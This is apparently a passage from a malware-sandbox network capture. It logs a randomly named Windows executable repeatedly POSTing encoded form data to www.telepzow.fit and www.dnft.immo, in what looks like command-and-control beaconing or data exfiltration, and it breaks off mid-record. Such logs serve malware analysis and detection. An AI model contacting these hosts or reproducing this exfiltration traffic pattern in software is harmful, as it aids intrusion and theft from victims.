Accept-Language: en-US,en;q=0.9
Content-Length: 199
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Host: www.telepzow.fit
Origin: http://www.telepzow.fit
Referer: http://www.telepzow.fit/oizn/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Ascii: QT=jSLLzUo1Ntko5/huCOgdcBlqSOIxmuK8YcNkUKzUoKkEQhszAvvGE1cWRmGwNrNC+txj5qKrdcilIHhDEleeTAYKrWLCNGqptZzDDQrU4DKN3DZMpokIIlasQIM8k6hCp8RQK1GHHFHX0DdQXNsRSMqvDeux/ynLRMSpYeqbrfhX6F4QF5T2LkUoiuE9mVGzLg==
                                                        [Dec 10, 2024 18:48:57.993571043 CET] 914 bytes IN
                                                        HTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:48:57 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nw9AzNricR9S9HnW0Vp2n74qEIfLP4sy8XcFWeC5DG27sL4iTUYIiXNt9XAICejIs6nTp8jfHMlU7iotzNcDkYJKrt0Y1bhoeqtsl58du%2FENfhg0NPXWk8eGJYrJzDB3QlGS"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8eff119ad837ebbd-YYZ
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=143156&min_rtt=143156&rtt_var=71578&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=705&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a
                                                        Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
                                                        [Dec 10, 2024 18:48:57.993618011 CET] 5 bytes IN
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID: 6 | Source IP: 192.168.11.20 | Source Port: 49761 | Destination IP: 104.21.64.208 | Destination Port: 80 | PID: 7508
                                                        Process: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        [Dec 10, 2024 18:49:00.157560110 CET] 725 bytes OUT
                                                        POST /oizn/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 219
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.telepzow.fit
                                                        Origin: http://www.telepzow.fit
                                                        Referer: http://www.telepzow.fit/oizn/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Ascii: QT=jSLLzUo1Ntko5bluAvgdLRkYOeIxvOKGYcBkULH6r8UEQDkzBr7GH1cWeGGpJrNJ+t8c5rGrdc2lIDlDDW2BTQYMg2KkJGqptZzDDQvy4DSN3zJMpJkLBFavXIM8g6h4p8RmKxe9HHPX0CtQX8sWYMqlO+vw1QqlRI2aL+PJrcxi2z1KYLnSI3Iame9VkXHoWo5OVfHygx6ApkRQk9CezC0=
                                                        [Dec 10, 2024 18:49:00.644364119 CET] 916 bytes IN
                                                        HTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:00 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G3pm5Y0CHbBeIGgtWgHYDtlH720KCwconnEncyLjZHcqIbinvD7zmNbOpDrALMyLTRlXYf2perzsnXdrdq1DACbBz9Ty0zd93zwC%2BBE53uG1kYI8Rw%2FdnYxYlFWOKUj2OvSA"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8eff11acded5d755-NRT
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=277463&min_rtt=277463&rtt_var=138731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=725&delivery_rate=0&cwnd=40&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a
                                                        Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
                                                        [Dec 10, 2024 18:49:00.644411087 CET] 5 bytes IN
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID: 7 | Source IP: 192.168.11.20 | Source Port: 49762 | Destination IP: 104.21.64.208 | Destination Port: 80 | PID: 7508
                                                        Process: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        [Dec 10, 2024 18:49:02.834871054 CET] 6445 bytes OUT
                                                        POST /oizn/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 7367
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.telepzow.fit
                                                        Origin: http://www.telepzow.fit
                                                        Referer: http://www.telepzow.fit/oizn/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Ascii: QT= [TRUNCATED]
                                                        [Dec 10, 2024 18:49:02.834920883 CET] 1429 bytes OUT
                                                        Data Ascii: 7lDgGt+HyOSWiKoluyfmXTN0BDLxax+Fy3iv7tSYtApoWXhI2abTVwTgCRxbzYW8tCudTtV2s9SKc37N1jUKOZzjY05LJUP8AZ7vKkdilKjlpw6aacvxRTMp5tiTeHGJRriDKJ6SaDfXU+QkycQFtZlqwHdbY/RK8rqeloMbv/Z32set3LuWMsuFRgDp2Z2M+XsMfKgHwFm3NfFh7L7hlCad+8ITRw7TPHlcv+1d/eOaxhvQPmN
                                                        [Dec 10, 2024 18:49:03.537161112 CET] 928 bytes IN
                                                        HTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:03 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rjbblhRlSXwaxKyCABD1MxWA%2FCC%2B7w%2BR9%2FGXd4NbKs%2BrjiKy162%2FdBoUSm7uWKmt5jeKXEPLJigHMHox0Kra498nLInCTks4dp3pdPD2FldTTXQ6Pzw%2FNwxFV1V%2BAF11Vf8B"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8eff11bd2bd4a24a-YYZ
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=142822&min_rtt=142822&rtt_var=71411&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7874&delivery_rate=0&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a
                                                        Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
                                                        [Dec 10, 2024 18:49:03.537204981 CET] 5 bytes IN
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID: 8 | Source IP: 192.168.11.20 | Source Port: 49763 | Destination IP: 104.21.64.208 | Destination Port: 80 | PID: 7508
                                                        Process: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        [Dec 10, 2024 18:49:05.556551933 CET] 442 bytes OUT
                                                        GET /oizn/?LLp=-2JPqdjXxxH4&QT=uQjrwkUUEo9A4dlQfcggdTsxH9QBobj0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrTBMBvACsMmeMqJHqbDbv0Ca02GpIn7UGPXA= HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        Host: www.telepzow.fit
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        [Dec 10, 2024 18:49:06.151998997 CET] 940 bytes IN
                                                        HTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:06 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=clEowAA6yD3UC5pVr53RZJzp%2F9U8AwE0MIOttb6%2BJ291iABAoFtw4sXjXr%2FhymTjtdiCo%2FNfBcbBod8JelC%2FP8%2F6BFjT3A5q%2BLbxmslRgQH4%2FM8Q9QarMlQqgrJv9VDRvfLU"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8eff11ce49d06ac1-SEA
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=182025&min_rtt=182025&rtt_var=91012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=442&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.27.2</center></body></html>
                                                        [Dec 10, 2024 18:49:06.152045965 CET] 5 bytes IN
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID: 9 | Source IP: 192.168.11.20 | Source Port: 49764 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 7508
                                                        Process: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        [Dec 10, 2024 18:49:11.544217110 CET] 696 bytes OUT
                                                        POST /yeky/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 199
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.dnft.immo
                                                        Origin: http://www.dnft.immo
                                                        Referer: http://www.dnft.immo/yeky/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Ascii: QT=2NeWI1jcYlDHxUAt8JOrAfvzbYwcRnYiUTihzds1PMtWmtZQbBUeny9QxC0/wjpnMnfEQQEmspLoTYMyUM2IF1u6NpciWD9ZI7CicHgr4vDaRCmOTHXIYm09bv+XC7525np50DZvP1lq6+EMJvQcGOsLil+NRwI3i3lWcUxKIsmonOOaUQo5bmO2/C/F2k3BJQ==
                                                        [Dec 10, 2024 18:49:11.680057049 CET] 1289 bytes IN
                                                        HTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:11 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1106
                                                        x-request-id: fff17439-0e23-4000-bdbb-76b451c22cde
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
                                                        set-cookie: parking_session=fff17439-0e23-4000-bdbb-76b451c22cde; expires=Tue, 10 Dec 2024 18:04:11 GMT; path=/
                                                        connection: close
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                        [Dec 10, 2024 18:49:11.680104971 CET] 506 bytes IN
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmZmMTc0MzktMGUyMy00MDAwLWJkYmItNzZiNDUxYzIyY2RlIiwicGFnZV90aW1lIjoxNzMzODUyOTUxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZG5mdC5pbW1vL3lla3k


                                                        Session ID: 10 | Source IP: 192.168.11.20 | Source Port: 49765 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 7508
                                                        Process: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        [Dec 10, 2024 18:49:14.241945028 CET] 716 bytes OUT
                                                        POST /yeky/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 219
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.dnft.immo
                                                        Origin: http://www.dnft.immo
                                                        Referer: http://www.dnft.immo/yeky/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Ascii: QT=2NeWI1jcYlDHz1wtwK2rVvvwR4wcfHYcUSehzcobPeJWmMpQaEoegy9Q+i0AvzolMgX6QSAmsoroTcIyX7aXHlu8W5caYj9ZI7CicH184rvaRyWOTkPJUG0+TP+XQL565npX0CFVPzhq674MQb8DMOsBml/ISiNekjJdXkgZPJeor4DAJicdY1SE7yGt0m2aUUMW7UsLDggnmpLTh/3SDb0=
                                                        [Dec 10, 2024 18:49:14.391386032 CET] 1289 bytes IN
                                                        HTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:13 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1106
                                                        x-request-id: 4053eb4c-8b5c-4f4e-a3bf-a64180e203ed
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
                                                        set-cookie: parking_session=4053eb4c-8b5c-4f4e-a3bf-a64180e203ed; expires=Tue, 10 Dec 2024 18:04:14 GMT; path=/
                                                        connection: close
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                        [Dec 10, 2024 18:49:14.391400099 CET] 506 bytes IN
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDA1M2ViNGMtOGI1Yy00ZjRlLWEzYmYtYTY0MTgwZTIwM2VkIiwicGFnZV90aW1lIjoxNzMzODUyOTU0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZG5mdC5pbW1vL3lla3k


                                                        Session ID: 11 | Source IP: 192.168.11.20 | Source Port: 49766 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 7508
                                                        Process: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        [Dec 10, 2024 18:49:16.925659895 CET] 2578 bytes OUT
                                                        POST /yeky/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 7367
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.dnft.immo
                                                        Origin: http://www.dnft.immo
                                                        Referer: http://www.dnft.immo/yeky/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Ascii: QT=2NeWI1jcYlDHz1wtwK2rVvvwR4wcfHYcUSehzcobPeBWl+hQanAehy9Q3C07vzp9Mm+9QSMcssboR5cyDaaXd1u8fZchWD9pI7TrcHl84rvaR0SOV3XJSG09bv+hC75W5nhh0CA3MApq5bIMSOQDAOsHoF/uSjxFknRrXkVEPOCo4ee8bCo+GW7O4ze31Uyecyo39k4aIEoVop7+283ZUcnn+jgql5Z+nJRDpARP3yHlgiA/sWYNrj04j9bGMFyIpRRkmeHI0XsNhF8onl6Luji+F8ijCLsB2m26a9RXzzgafhrRtCoMtesV9FaASDxJQGWP98iuHNvbfqa34jK39VnCU1Qs/G5IryorHTmY+TBuk3FLKXiTUPpopa9fY7e3u5Fq7iOxfYItztyxz8dvxd9lCC0ppCqBqltGMYml8IHmkwVsMW2y3wolRmlzMCRUkfwgyKp5dAHrNH9fL0DQqAeflLmRfssLmS3PBDHQOi6WVmQiAnIP0Nw/WT+ARL05yFWDQJLTwbmWpviSESPGTVaaJ/dAHG1Myof7LjnoXIa+2zZKzs8u8Kprx1VkT2PvtGLGlUEKl5srO/NaEYKN3X85klg3eBf0ztVwNPC20MLx82eyfw3J3gW5fky8yYH8lR0PtbN/5pJ9i0G/UJVhg2ZGCCiKw8vBHGW6UDRTOhEgF3Dx/j+hB5Pf2JWkJx1XD99H2KEApyuwiT+mMYNJW4ApUAS1qBOOrJv1kD3zU3nKDje/WAI8UwcLMqdCLuNA8gRvKxZqPAcb7lQzm2spMdxH9iqYn1ZD+5K9ZM5VG+QRpbTdGUxqH+/lWauRPXBw13dGWpx7O+GAYVM+yhEUgN7tl3WOE5LtoJ6KDDqYVN3pmH9MFHBsGO+krWZvpQaJXEZA9/4IYsa73Uy1Ltwwhu3Vpk8OVfFe/J1j7Qo5+WoJbOL11UHXQUEm6/R0YrevYsqyiEbqrhz3JcGa3n36/zCDFs1UqDLGnJttCfoJhplwfegsQ [TRUNCATED]
                                                         Dec 10, 2024 18:49:16.925740957 CET | 5287 | OUT | Data Raw: 2b 5a 4b 4b 35 32 38 68 49 49 75 6c 61 34 6a 4d 70 4e 7a 42 75 71 77 58 45 6a 41 42 79 43 5a 62 69 36 41 4a 43 36 34 49 32 41 63 6b 55 4f 4b 67 61 44 69 6d 45 33 78 4c 66 4b 42 43 2b 31 75 37 57 73 46 68 4c 73 59 5a 65 45 56 39 37 54 49 6d 6f 62
                                                        Data Ascii: +ZKK528hIIula4jMpNzBuqwXEjAByCZbi6AJC64I2AckUOKgaDimE3xLfKBC+1u7WsFhLsYZeEV97TImobPMDou/aQtiL/CqVcw5jGBb769/UwT0dl7r5T7Dxqp2RLMN4WCHaurbfrG6dBNGkbu8FtCK8yxhXSYCoG6/jKYp6WNl9zj7aQKHB+5A08GbIEI8jDEnsdM1ZhunBTKDwcPDqd1TT+ZXHp1ekg/hwY4k4AmMMIfD70+
                                                         Dec 10, 2024 18:49:17.087289095 CET | 1289 | IN | HTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:16 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1106
                                                        x-request-id: ac43ae81-0f77-498b-84e9-93e0ade2a980
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
                                                        set-cookie: parking_session=ac43ae81-0f77-498b-84e9-93e0ade2a980; expires=Tue, 10 Dec 2024 18:04:17 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 4e 31 30 38 47 43 78 4e 35 48 53 45 6f 4b 4a 66 2b 55 75 69 52 41 57 61 50 37 63 64 6d 61 6e 64 70 73 7a 6c 78 35 53 41 75 7a 44 75 78 70 67 47 57 67 76 36 45 38 54 43 54 74 4c 59 30 47 72 66 35 34 6c 77 75 4a 4a 74 30 75 57 31 2b 30 51 67 2f 74 49 36 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                         Dec 10, 2024 18:49:17.087317944 CET | 506 | IN | Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWM0M2FlODEtMGY3Ny00OThiLTg0ZTktOTNlMGFkZTJhOTgwIiwicGFnZV90aW1lIjoxNzMzODUyOTU3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZG5mdC5pbW1vL3lla3k


                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         12 | 192.168.11.20 | 49767 | 199.59.243.227 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         Dec 10, 2024 18:49:19.634412050 CET | 439 | OUT | GET /yeky/?QT=7P22LBHaa1jf6nBJoZKhVMfAW6E6enltUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadCya5VvUUehVECqXYJH1JxrXGdxyqb1WHUVg=&LLp=-2JPqdjXxxH4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        Host: www.dnft.immo
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                         Dec 10, 2024 18:49:19.804872990 CET | 1289 | IN | HTTP/1.1 200 OK
